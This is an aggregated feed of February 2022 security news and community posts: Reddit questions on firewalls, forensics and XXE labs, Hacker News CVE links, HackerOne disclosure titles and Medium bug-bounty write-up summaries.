    Hey all, Here is a screen grab of ‘grep “Failed password” /var/log/auth.log’ for reference: https://imgur.com/a/G2bwrZO I have the port range 30999:59999 set to DENY IN from ANYWHERE for udp and tcp traffic, yet I’m still receiving login attempts within the ranges of blocked ports. Can anybody spot a misconfiguration, or perhaps explain what I’m missing with UFW? submitted by /u/OffishalFish [link] [comments]  ( 1 min )
    Hardening guides primarily for Microsoft products
    Hi everyone, I remember that the NSA used to make the de facto hardening guide for Windows/AD environments. However, I can only find one relating to Windows Server 2000. Are there any modern versions of that relating to the Microsoft/Azure/AD environments from another trusted instance, not some company trying to sell a product? Thank you for all your support. submitted by /u/Adrixan [link] [comments]  ( 1 min )
    Need help understanding XXE Injection
    So, I was practicing XXE labs on portswigger web sec academy and I came across a DTD payload with the characters "%" in the nested entities. I tried to find if there is a syntax specification for this in xml but found nothing regarding it, all I found by googling this are just some more xml payloads. So, anybody have any idea what these characters exactly are and what they do? I am thinking like these are only used in nested entity definitions, is that correct? I am totally confused. Any help would be greatly appreciated. PS: I am a complete newbie. So, if this is a stupid question forgive me! submitted by /u/DeadTree_22 [link] [comments]  ( 1 min )
    Fml it’s pronounced demon!
    I did not know that daemon is pronounced demon. Maybe someone else will see this and learn too. submitted by /u/lowkiwatchingyou [link] [comments]  ( 2 min )
    Do I need to be good at programming (C to be more specific) in order to get ahead in my CyberSecurity field?
    The moment I opt in my college first year (1st sem), The college gave us the syllabus of C, I'm pretty bad at it cuz C isn't something that I had dealt firsthand in the last year and tbh I'm a python kinda guy I only worked with python so C isn't a area of my interest. So my question is that Do I need to be too good at C is it gonna be relevant somehow later in hacking field? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Edge Filelinks
    In newer versions of edge filelinks (e.g. to a unc path) are blocked by default. Are there any security issues allowing filelinks for secure intranet zones? It can be activated via policy https://docs.microsoft.com/en-us/deployedge/microsoft-edge-policies Thanks! submitted by /u/montyspinneratz [link] [comments]
    Best WiFi card for penetration testing, passive mode, injection?
    I understand that my terminology might be a bit out of date. It's been a while, I know to research on my own. I want to know, though, what the best advice on here is for cracking 802.11 networks, and such things. Last I checked it was the ALFA AWUS 036 N card, I have one, and then they released the 802.11n version. What is the gold standard these days? The best I can tell, is actually nothing - with a strong password, WPA-2, modern encryption... What are we dealing with these days? I still have my ALFA card and several other 802.11n cards that can inject packets. Just feel like there has been a lot of fragmentation over the last decade and really, any opinions on whether or not the whole "WiFi hacking" gig is dead, well, I want your thoughts. submitted by /u/ValerieVexen [link] [comments]  ( 1 min )
  • Open

    Apiiro team uncovers 0-day vulnerability in Argo CD
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30212283 Points: 1 # Comments: 0  ( 6 min )
    CVE-2022-24348: vulnerability in Argo CD can be used to steal sensitive info
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30204744 Points: 3 # Comments: 0  ( 6 min )
  • Open

    Linux | Madaidan's Insecurities
    submitted by /u/Nhamatanda [link] [comments]
    Rooting Gryphon Routers via Shared VPN : 🎵 This LAN is your LAN, this LAN is my LAN 🎵
    submitted by /u/stargravy [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Nooie baby monitor
    submitted by /u/jaymzu [link] [comments]
    Silly proof of concept: Anti-phishing using perceptual hashing algorithms
    submitted by /u/anvilventures [link] [comments]  ( 2 min )
    Compromising out-of-bound secrets on Argo CD platform utilizing a malicious Kubernetes Helm Chart (CVE-2022-24348)
    submitted by /u/dalmoz [link] [comments]
  • Open

    Anubis HackTheBox Walkthrough
    Introduction Anubis is an “insane” level CTF box available on the HackTheBox platform designed by 4ndr34z. The box covers a real-life scenario of initial exploitation The post Anubis HackTheBox Walkthrough appeared first on Hacking Articles.  ( 12 min )
  • Open

    Reflected XSS and Blind out of band command injection at subdomain dstuid-ww.dst.ibm.com
    IBM disclosed a bug submitted by smokin-ac3z: https://hackerone.com/reports/410334
    'net/http': HTTP Header Injection in the set_content_type method
    Ruby disclosed a bug submitted by chinarulezzz: https://hackerone.com/reports/1168205
  • Open

    100 Days of Hacking — DAY 1
    Let’s see how it goes Continue reading on Medium »  ( 2 min )
    Threat Modelling
    Few words on Threat Modelling. Continue reading on Medium »
    Easy Understanding of Owasp Top 10-2021
    What is owasp ? Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - BUSINESS LOGIC VULNERABILITIES LAB SOLUTIONS
    A business logic vulnerability is one in the design and implementation of a web application that lets an attacker elicit unintended behavior… Continue reading on Medium »  ( 15 min )
  • Open

    SecWiki News 2022-02-04 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    How to avoid API blind spots in web application security testing
    APIs are a crucial part of modern web application development and make up a large chunk of your total web attack surface. Learn how Invicti helps organizations make API vulnerability testing an integral part of their secure SDLC. READ MORE  ( 4 min )
  • Open

    Quiztime — Random OSINT Challenge 11
    On Jan 23, 2022, Quiztime (contributor @SEINT_pl) shared a new OSINT quiz with us. Continue reading on Medium »  ( 2 min )
    How to Track Down Cyber Threat Actors and FBI’s Most Wanted Cybercriminals Using OSINT and Maltego?
    Do you want to become famous? Did you know that an OSINT conducted today is a tax payer’s buck saved somewhere? Keep reading. Continue reading on Medium »  ( 8 min )
  • Open

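    Winter Training Camp | The Diverse Styles of C2 in Advanced Threat Activity
    As a noun, C2 refers to the infrastructure controlled by an APT group, namely IPs, domains, and URLs.  ( 1 min )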
  • Open

    CVE-2022-24348: vulnerability in Argo CD can be used to steal sensitive info
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30204744 Points: 3 # Comments: 0  ( 6 min )
    Hostapd/wpa_supplicant: new release v2.10 (with CVE fixes)
    Article URL: https://lists.infradead.org/pipermail/hostap/2022-January/040148.html Comments URL: https://news.ycombinator.com/item?id=30200900 Points: 1 # Comments: 0  ( 3 min )
  • Open

    Lumberjack Turtle — Writeup
    Difficulty: Medium Room  Description: No logs, no crime… so says the lumberjack.  ( 3 min )
    What is Social Engineering
    Art of Psychological manipulation  ( 2 min )
    Content Discovery TryHackme
    Hi, amazing fellow hackers, I produced an interesting topic web content discovery. It is useful in bug bounty and the most important thing…  ( 3 min )
    Day 21, Web Reconnaissance Or Information Gathering — Part 6#100DaysofHacking
    Get all the writeups from Day 1 to 20, Click Here Or Click Here.  ( 3 min )

  • Open

    Reload4j 1.2.18.5: A drop-in replacement for Log4j 1.2.17 and CVE fixes
    Article URL: https://reload4j.qos.ch/news.html Comments URL: https://news.ycombinator.com/item?id=30200504 Points: 2 # Comments: 0  ( 1 min )
    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    What is considered more secure VPN client software on IoT device or IoT device behind VPN?
    submitted by /u/baghdadcafe [link] [comments]  ( 1 min )
    Passive log analysis software
    Hello, I am interested if there is a tool/software that will help me analyze logs from web server, ssh and Mysql for intrusion, but on another PC. So I basically want to pull logs from many servers and run them through some software that can detect possible SQLi or path traversal attempts, something like that. I know there is Snort and SIEMs but is there any software that will use for example Snort's engine and rules to do this analysis offline? Or can I run snort on some log file from other server? P.S. possibly open source. Thanks. submitted by /u/P-e-t-a-r [link] [comments]  ( 5 min )
    OneNote Visibility
    Hi Guys. I like OneNote, and my org blocks anything else, I use it at work and at home. Three questions: If I login to my work OneNote account, on my personal Mac/Win/Linux computers, can my work track my computers at all, or see its MAC address or name? If I login to my personal OneNote account on my work computer, can they read my OneNotes? Do the answers to the above two questions apply for all of OneDrive too? Appreciate any responses as I've been told that it's all pretty private so I should be good to go with either. submitted by /u/bloqs [link] [comments]  ( 3 min )
  • Open

    Index of NASA's Land Processes Distributed Active Archive Center
    https://e4ftl01.cr.usgs.gov/ASTT/ Some sort of unsecured government website. submitted by /u/Main_Force_Patrol [link] [comments]
    Indexes from Bornless.Grotto.Faith
    https://bornless.grotto.faith/pages/ https://bornless.grotto.faith/images/ submitted by /u/EmuAnon34 [link] [comments]
    Mozart Opera Omnia in FLAC format (200 CDs)
    http://rmeyer.comelitdns.com/Music/MOZART%20225/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    Doom 2 WADS
    submitted by /u/millhouse187 [link] [comments]  ( 1 min )
    Lots of movies and TV. Slow connection.
    submitted by /u/josephalbright1 [link] [comments]
    I need a search engine for stat.ameba.jp
    Several blogs from some J-Pop groups were deleted but the photos remain on ameba's servers. I have found a few (https://stat.ameba.jp/user_images/82/56/10138975701.jpg) but would like to search images I have in low quality on this site. submitted by /u/Alarod [link] [comments]
  • Open

    Beethoven X Joins Balancer Labs’ Bug Bounty Program
    In April 2021, Balancer Labs decided to go big in pursuit of uncovering vulnerabilities in their V2 Vault architecture with the launch of… Continue reading on Balancer Protocol »  ( 2 min )
    [Bugbounty]SSRF — IFRAME INJECTION E XSS REFLECTED
    Today I'm going to talk a bit about a flaw that led me to two reports; unfortunately both were duplicates, but it served as experience and… Continue reading on Medium »  ( 2 min )
    Subdomain Takeover Bugs — When They’re Applicable And When They’re Not
    At Immunefi, we receive a large number of reports from whitehats regarding subdomain takeovers. But we have a policy of always marking… Continue reading on Immunefi »  ( 3 min )
    UnderRated Tool For Pass-The-Hash[Evil-WinRM]
    First Of all I’ll Describe What is Pass-The-Hash Attack Continue reading on Medium »  ( 1 min )
  • Open

    A detailed analysis of Lazarus malware disguised as Notepad++ Shell Extension
    submitted by /u/CyberMasterV [link] [comments]
    NTLM Relaying - A comprehensive guide
    submitted by /u/jeanc0re [link] [comments]  ( 1 min )
    [CVE-2022-23602] Don't trust comments
    submitted by /u/crower [link] [comments]  ( 1 min )
    History of REvil: detailed report on the rise and fall of a Russian crime gang.
    submitted by /u/Jazzlike-Resource500 [link] [comments]
  • Open

    Interview questions for entry level incident response positions?
    i have an interview coming up soon. What sort of technical questions /scenario questions should I be expecting? Thx submitted by /u/tfulab23 [link] [comments]  ( 2 min )
    Photorec Issues
    I am new to computer forensics and am having trouble installing autopsy to my Mac. When I am installing autopsy, I get an error when checking the prerequisites for autopsy. Specifically, when I type "sh unix_setup.sh" into terminal, it reads "ERROR: PhotoRec not found, please install the testdisk package." I have installed testdisk so I am just confused why I get this error. Sorry if this is a stupid question, I am just dumbfounded by this error message. submitted by /u/Vekayy [link] [comments]  ( 1 min )
  • Open

    Remote Code Execution on .8x8.com via .NET VSTATE Deserialization
    8x8 disclosed a bug submitted by 0daystolive: https://hackerone.com/reports/1391576
    text injection and content spoofing
    OneWeb disclosed a bug submitted by aman420: https://hackerone.com/reports/1353200
    Reflected Xss in https://world.engelvoelkers.com/...
    Engel & Völkers Technology GmbH disclosed a bug submitted by pl4gue_shell: https://hackerone.com/reports/1401209
    Ruby CVE-2021-41819: Cookie Prefix Spoofing in CGI::Cookie.parse
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1464396 - Bounty: $2000
  • Open

    SecWiki News 2022-02-03 Review
    A new technique for bypassing an app's root detection by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Tuning in the Hot Spots
    A few months ago, I posted an instructional video on using internet radio servers to tune and listen to AM radio stations in Ukraine and… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 10
    On Jan 20, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was, interesting. We had to figure out… Continue reading on Medium »  ( 2 min )
    Open-source Intelligence. With OSINT Course Giveaway !!
    Open-source Intelligence: Premium Hacking Course In Free !! Continue reading on Medium »  ( 2 min )
  • Open

    SnapFuzz: New fuzzing tool speeds up testing of network applications
    Article URL: https://portswigger.net/daily-swig/snapfuzz-new-fuzzing-tool-speeds-up-testing-of-network-applications Comments URL: https://news.ycombinator.com/item?id=30191854 Points: 17 # Comments: 2  ( 4 min )
    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    What is Red Teaming?
    This blog post was published on PurpleBox website on Feb 2nd, 2022. Continue reading on PurpleBox »  ( 6 min )

  • Open

    Debian has not fixed CVE-2021-44142
    Article URL: https://security-tracker.debian.org/tracker/CVE-2021-44142 Comments URL: https://news.ycombinator.com/item?id=30183811 Points: 2 # Comments: 1
  • Open

    Entry-level Penetration Tester salary in Switzerland?
    What would be an approximate salary range for a penetration tester in Switzerland (Zürich area as a reference)? Not necessary big 4 but also small or medium size companies, for an entry level position, with a master's degree, and a 6-month internship in the field as the only experience. submitted by /u/BroX111 [link] [comments]  ( 1 min )
    How would you fix today's computer security problems?
    UPDATE: My original question was too broad. Please choose which significant problem you might solve based on your expertise. No silver bullet to solve all security problems is necessary. Thanks for your constructive criticism! How would you fix today's computer security problems if you could start any hardware or software company, or create any technology related standard. It could be anything, maybe new hardware and software working together that fixes a major problem like hacking or malware. I don't want to put anyone in a creative box so I'll share my idea later today. Please don't read any results until you have thought of something. Update: How would you protect as many people as possible when you run control a company like Google, Microsoft, Intel, etc., or can pass new laws or create new tech standards. submitted by /u/greyyit [link] [comments]  ( 5 min )
    EDR / XDR on premise
    Hi Anyone knows of useful edr products which could be operated on premise, without using cloud services? Could also just be a so called next gen av at least? Maybe you could even share some experience? All products I know are cloud based and report too much to the cloud (e.g. file paths, user information etc). I've read of Cybereason once, but the link to the on PREM offer is invalid... Bitdefender advertises an edr on prem, but I only know them from a consumer perspective. Thanks! submitted by /u/winschdi [link] [comments]  ( 2 min )
    Scanning for locations.
    Hello, Any tips on scanning slower with gobuster or other tool for finding paths and evade WAF. I'm afraid it will be detected and probably my machine will be blocked by it. submitted by /u/tryingtoworkatm [link] [comments]  ( 1 min )
    How Are Hackers Caught
    If tools like proxies are available to hackers, how are they caught? submitted by /u/Odd_Rip6706 [link] [comments]  ( 4 min )
    Advice deciding between 2 cybersecurity offers at the Big4
    Hey guys, I recently received cybersecurity consultant offers from both KPMG and EY. While I do have a lot of info about each firm based on my interviews and offer letters, I was wondering if there were any former/current employees or anybody here who has worked with these two firms, and if they could share about their experiences? Compensation-wise, EY's is higher. They're both in the same city on the West Coast. Thanks! submitted by /u/bongotw [link] [comments]  ( 2 min )
    Question regarding CTI event that can lead to an incident
    Hi user, I have a question regarding threat intelligence and "incident" response. Let's take an example: I work for Company A. I notice that an access broker sells access to Company B. Company A and Company B work together and have some network connexion to exchange data. In this case, we can suppose that company B will increase our threat risk due to possible lateral movement, but as the threat actor "only" sells an access, we can't determine what kind of threat we will be facing. On the business side this will be hard for them to understand that it's a potential threat and we should execute a containment phase by cutting connexion with company B. And for the detection team, we don't have enough info on what kind of threat they should monitor. In your opinion, what should I do? submitted by /u/octave_ [link] [comments]  ( 2 min )
  • Open

    Using Power Automate for Covert Data Exfiltration in Microsoft 365
    submitted by /u/rsobers [link] [comments]
    Hacking Google Drive Integrations
    submitted by /u/albinowax [link] [comments]
  • Open

    The evolution of a Mac trojan: UpdateAgent’s progression
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    Walkthrough — Hacktoria: Geolocation 06
    As I’m having so much fun doing the Hacktoria’s geolocation challenges, I have decided to just keep solving them and writing walkthroughs… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 8
    On Jan 16, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was simple but cool. We had to figure out… Continue reading on Medium »  ( 3 min )
  • Open

    Vulnerability Capstone — Tryhackme
    Vulnerability Researching  ( 2 min )
    CTF Write-Up: Rain
    CTF Write-Up: Rain  ( 3 min )
    Multiple HTTP Redirects to Bypass SSRF Protections
    Always try more than one HTTP 302 redirect when testing for SSRF  ( 4 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn  ( 2 min )
    How I Made $16,500+ By Hacking Caching Servers — Part 1
    @bxmbn  ( 2 min )
    Data exfiltration using XXE on a hardened server
    Blind XXE exploitation using error based method.  ( 4 min )
    Day 20, Web Reconnaissance Or Information Gathering — Part 5#100DaysofHacking
    Get all the writeups from Day 1 to 19, Click Here Or Click Here.  ( 3 min )
    How I Hacked Kerala Road Transport Corporation(KSRTC)?
    Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration…  ( 2 min )
  • Open

    Serious Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/serious-vulnerability-in-wordpress-plugin-essential-addons-for-elementor-eliminated Comments URL: https://news.ycombinator.com/item?id=30179610 Points: 2 # Comments: 1  ( 3 min )
    Critical Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/critical-vulnerability-in-wordpress-plugin-essential-addons-for-elementor Comments URL: https://news.ycombinator.com/item?id=30179238 Points: 1 # Comments: 0  ( 3 min )
    Fastly patches memory leak HTTP/3 vulnerability in H2O HTTP server project
    Article URL: https://portswigger.net/daily-swig/fastly-patches-memory-leak-http-3-vulnerability-in-h2o-http-server-project Comments URL: https://news.ycombinator.com/item?id=30177816 Points: 3 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-02-02 Review
    Security Academic Circle 2021 annual summary by ourren 2021 year-end summary: my growth in the Apache IoTDB group at Tsinghua by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Common authentication and authorization vulnerabilities (and how to avoid them)
    Authentication and authorization are two cornerstones of modern web application security, but there are many ways to get them wrong. Learn how to identify common security defects and avoid vulnerabilities that could allow attackers to access restricted data and functionality by bypassing authentication, authorization, or both. READ MORE  ( 6 min )
  • Open

    Notional Double Counting Free Collateral Bugfix Review
    Summary Continue reading on Immunefi »  ( 5 min )
    My first bounty, IDOR + Self XSS [€3000]
    Every hacker would have come across this, the first bounty. I can’t actually explain how it feels but I know that most of you can… Continue reading on Medium »  ( 5 min )
    How To Spice Up Your Programming Journey With 5 Hacks.
    If you are a beginning programmer like me as much as you love programming, there will be times when you feel down. This is not you been… Continue reading on Medium »  ( 2 min )
  • Open

    Utility components and the sx prop in Material-UI
    The Box utility component renders as a div element and makes it possible to use shorthand syntax for CSS styles… Continue reading on Medium »  ( 1 min )
  • Open

    Index pages from 973-eht-namuh-973
    https://www.973-eht-namuh-973.com/search-pages/ https://www.973-eht-namuh-973.com/coloured%20site/ https://www.973-eht-namuh-973.com/Black%20and%20White/ https://www.973-eht-namuh-973.com/images/ https://www.973-eht-namuh-973.com/rotators/ https://www.973-eht-namuh-973.com/Alchemy/ https://www.973-eht-namuh-973.com/Magick/ Let me know if there’s others I missed. submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
    Animated movies (sorry if repost)
    submitted by /u/lostsquanderer [link] [comments]
    Large folder of videos pertaining to game design
    http://mirror.reenigne.net/gdc/ submitted by /u/inoculatemedia [link] [comments]
    Old gramophone records
    http://oldgramophonerecords.co.uk/4y1/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Multiple vulnerability leading to account takeover in TikTok SMB subdomain.
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1404612 - Bounty: $999
  • Open

    Recycle bin conundrum
    Have a read only external USB device with a copy of an imaged recycle bin. Goal is to pass off SUB to attorney for review of recycle bin $R files. WIN10 forensic laptop (A) recycle bin is empty, no software running. When plugged into forensic laptop, I can navigate via File Explorer to the recycle bin folders and files. I can open the $R files and SID of user for 2 user accounts. I properly eject SUB and connect to another laptop (B) before passing off to attorney. Laptop (B) is my day to day use laptop. The recycle bin on laptop (B) is empty. Laptop (B) is a WIN10 machine. When I plug SUB into laptop (B) and navigate to recycle bin files, no SIDs, instead recycle bin icons. When I click on the recycle bin icons, no contents. Any ideas on how to resolve this ? submitted by /u/ATXChimera [link] [comments]  ( 1 min )

  • Open

    Newbie investigating hdd
    Hello there, recently acquired some used HDD to try forensics as a student in cyber security. I'm using Kali Linux in forensic mode. Have a few questions: 1) Can using fdisk -l or parted -l modify data on the hdd? (both launched as root) What about gparted? (if not touching anything oc) 2) Working as root, is chmod a-w /dev/sde (the drive "location") really useful, like will it really prevent any write even from root? 3) Created an image with dcfldd, asked for sha1 checksum, and before imaging used sha1sum on /dev/sde. They match. Does anyone work another way? 4) Tried to import the image on autopsy with different settings but no file or anything else found. Then successfully linked to /dev/loop1 using losetup, but could not mount the "partition" (no filesystem nor partition is detected with parted -l, but gparted tells sde is an ataraid partition). Had some error like "unknown filesystem type 'ddf_raid_member'", so after a bit of digging tried some stuff with mdadm, but did not work. Any idea? submitted by /u/ner00n [link] [comments]  ( 2 min )
    Creating Encase Image of Macbook Pro Max (A2485)
    Hi everyone, I want to create an encase-image from a MacBook (Model A2485, M1 Max) but any of my attempts so far have just failed. Password is known and I have physical access to the device. Following things I already tried: - boot external usb with Paladin Edge -> failed to boot from it (tried to allow Booting from external sources via recovery, but there was no option for enabling) - put the MacBook into targetdisk mode and connected it to another iMac -> tried to create an image via ewfacquire but the shared disk wasn't an extra device (or I failed to see it) - boot external usb with Paladin Edge on another iMac, put the MacBook into targetdisk mode and connected it to the iMac -> Paladin Edge doesn't recognize the shared disc My last idea is just to do a timemachine backup from the macbook to a clean / wiped hdd and create an encase image from it ... Does someone have any other ideas? Would be very happy about any suggestions! Thanks in advance! submitted by /u/frcGuy81 [link] [comments]  ( 2 min )
  • Open

    Inside Trickbot, Russia’s Notorious Ransomware Gang
    submitted by /u/CyberMasterV [link] [comments]
    New Hybrid Campaign OiVaVoii Uses Malicious OAuth Apps | Cyware Hacker News
    submitted by /u/ITlocknkey [link] [comments]
    Using PwnKit-Hunter to check for CVE-2021-4034 Vulnerable Systems
    submitted by /u/jat0369 [link] [comments]
    Remote root vulnerability for Samba (CVE 2021-44142)
    submitted by /u/lormayna [link] [comments]  ( 1 min )
  • Open

    Twitter stores original account names, dox vulnerability via Twitter Spaces
    Article URL: https://twitter.com/tszzl/status/1488466979799265281 Comments URL: https://news.ycombinator.com/item?id=30169435 Points: 31 # Comments: 1  ( 1 min )
    Arbitrary code execution vulnerability in Samba
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30166148 Points: 3 # Comments: 0  ( 1 min )
    High severity vulnerability in Element Desktop 1.9.6 and earlier
    Article URL: https://matrix.org/blog/2022/01/31/high-severity-vulnerability-in-element-desktop-1-9-6-and-earlier/ Comments URL: https://news.ycombinator.com/item?id=30163784 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SQL injection at /admin.php?/cp/members/create
    ExpressionEngine disclosed a bug submitted by khoabda1: https://hackerone.com/reports/968240
    Information disclosure-Referer leak
    Brave Software disclosed a bug submitted by kkarfalcon: https://hackerone.com/reports/1337624 - Bounty: $500
    The Return of the Grinch
    h1-ctf disclosed a bug submitted by w31rd0: https://hackerone.com/reports/1433581 - Bounty: $1000
    Saving Christmas from Grinchy Gods
    h1-ctf disclosed a bug submitted by akshansh: https://hackerone.com/reports/1434017 - Bounty: $1000
    Full Response SSRF via Google Drive
    Dropbox disclosed a bug submitted by bugdiscloseguys: https://hackerone.com/reports/1406938 - Bounty: $17576
    Reflected Xss On https://vk.com/search
    VK.com disclosed a bug submitted by b4walid: https://hackerone.com/reports/1454359 - Bounty: $500
  • Open

    [Question] How are these directories discovered? Is it random web-surfing then sharing? Or do some of you use crawlers?
    Basically says it all in the title! I just found this sub-reddit, VERY COOL! I am a /r/datahoarder and I appreciate this sort of thing! I am just curious as to how these open directories are discovered. Thanks all for being a part of this community! submitted by /u/cs_legend_93 [link] [comments]  ( 1 min )
    Does anyone have OD-Shots uploaded in 2019 and 2020?
    I'm looking for .xlsx files that were posted in 2019/2020 on this sub, because the links that were uploaded are now dead. Did anyone save them and can upload them once again? Again, I'm not looking for last upload but files that were shared earlier. submitted by /u/GingrFattyJesusFreak [link] [comments]  ( 1 min )
    Filechef not working???
    Does anyone know if https://www.filechef.com/ is down??? submitted by /u/klutz50 [link] [comments]
    photos and documents relating to Russian involvement in Ukraine
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    high res images of Russian dairy products
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    No Rate Limiting on OTP sending
    Firstly I would like to say that this is my first ever writeup for the InfoSec community and I may not be so good at presenting the… Continue reading on Medium »  ( 2 min )
    Theoretical Bugs With No Impact Don’t Get Paid — Here’s Why
    As a whitehat, it’s easy to want to submit as many bugs as possible to a project — especially projects on Immunefi, because the bounties… Continue reading on Immunefi »  ( 2 min )
    H1-CTF Hacky Holidays Writeup
    Hey everyone I hope you all are fine and doing good, In December Hackerone made a 12 day 12 level CTF called Hacky-Holidays which had 12… Continue reading on Medium »  ( 8 min )
    My experience of Hacking The Dutch Government
    Hi Everyone! , Continue reading on Medium »  ( 2 min )
    OSINT Tips for Penetration Testing
    In this article, we will discuss some of my favorite OSINT techniques that can help during your penetration testing activities. Continue reading on Medium »  ( 1 min )
    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022! Continue reading on InfoSec Write-ups »  ( 2 min )
    Password Spraying Attack
    Hello everyone! 🎉 Continue reading on Medium »  ( 1 min )
    A Peculiar Case of XSS and my first bug
    Hello everyone, I am new to security stuff and will share how I was able to get few XSS in not so common way. Continue reading on Medium »  ( 1 min )
    IDOR vulnerability on invoice and weak password reset leads to account take over
    This year I started doing bug bounties and I only got valid p5 report and my report for p4 and p3 got rejected. Continue reading on Medium »  ( 3 min )
    Understanding Automation in Bug Bounty
    ==UNDER CONSTRUCTI Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Continue reading on Medium »
  • Open

    Question on using VMware pro and Nessus, isolating one VM from communication with internet.
    I need help running vuln scan using vm workstation pro and Nessus :/ Looking for advice/help on vuln. scanning using VMware workstation pro and Nessus Hey folks!!! I am looking to run Nessus on one VM, and run the vulnerability scan on a second VM. My constraints are that the VM running Nessus should be able to access/communicate out to the internet, while the VM being scanned should not be able to communicate to the internet — it should only be able to communicate with the VM performing the Nessus scan. I tried setting up both VMs on a host only VMnet, but Nessus was not able to get or use certain plugins that way. I’m looking for any help or advice setting this up how I described as I have not been successful. Thanks in advance for any help! submitted by /u/enki0817 [link] [comments]  ( 1 min )
    IRM/document encryption... Why isn't it used more?
    I'm a MS:CS student taking some cybersecurity classes. We learned about IRM, basically symmetrically encrypted documents with the keys managed by a central server backed via AD or whatever the org uses for AAA. It sounds pretty useful for dealing with vendors and helping deter exfiltration (and as a bonus, leaked docs encrypted at rest can't easily be used to extort ransoms), but it doesn't sound like very many places use it. Are the downsides of cost, difficulty of use for the user, and vendor lock-in a deal breaker for a lot of enterprises? Is the prevailing view that since someone can still take pictures of the screen with their phone, it's not worth the effort? Or that this kind of threat isn't considered to be very serious? What other real world issues am I not considering? Cheers submitted by /u/berrmal64 [link] [comments]  ( 4 min )
    Help me guys
    I have downloaded 2 photo recovery apps from Play Store into my phone. But I am scared that they might be fake apps which steal photos. I have checked the privacy policy in which it was stated that The information that I request will be retained on your device and is not collected by me in any way. But now I'm not sure whether I can trust them. The apps seem to be fake with manipulated reviews. Where would all my photos go to if they are sus apps? Do you guys think that they are sus apps by high chances? It would be nice if I get replies... Thank you! submitted by /u/WhiteSwordMaster [link] [comments]  ( 1 min )
    Has my NVR been hacked?
    Was just looking at my IDS alerts on my pfSense router and noticed the following entries seen in the screenshot here https://imgur.com/a/AMfpMaH. I've done a whois on some of the source IP addresses and they're questionable, to say the least. The device in question is a Hikvision NVR. My main concern is, has my NVR been hacked and turned into a TOR relay/exit node? Is there anything I can do to test this? I also want to point out that I don't have any ports opened facing the internet for this NVR which is also a bit weird as I thought that would offer me more protection! TIA submitted by /u/Bosshogg226 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-01 Review
    No news updates today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Solidity Audit & Ethereum Smart Contract Analysis using Mythril - Blockchain Security #2
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022!  ( 2 min )
    Hack a Linux Desktop with The Cheapest USB Rubber Ducky and The Android Terminal (Termux)
    Last time, I have written an article about making a USB Rubber Ducky with less than $3 and I did a simple test and attach how to…  ( 3 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
    Understanding Steganography for Capture The Flag Challenges
    what is Steganography? where it is used? Steganography in CTF’s  ( 3 min )
    Paytm-Broken Link Hijacking
    Hello Everyone….  ( 3 min )
    TryHackMe — Extending Your Network
    Ctf info writeup  ( 4 min )
    Everyday-Cyber
    Day-1  ( 4 min )
    The Story of an RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them…  ( 5 min )
  • Open

    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
  • Open

    RCE in Samba(CVE-2021-44142)
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30158662 Points: 3 # Comments: 0  ( 1 min )
  • Open

    Beginner Bug Bounty Guide - Part 5
